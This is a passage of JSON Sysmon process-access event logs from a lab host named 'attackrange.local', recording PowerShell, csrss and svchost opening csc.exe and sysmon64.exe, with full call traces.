7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+bbb1d100(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977681e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-00101ADF0700}","TargetProcessId":"2708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+bbb1d100(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+bbb1d100(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977681e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nTargetProcessId: 2708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-00101ADF0700}","TargetProcessId":"2708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 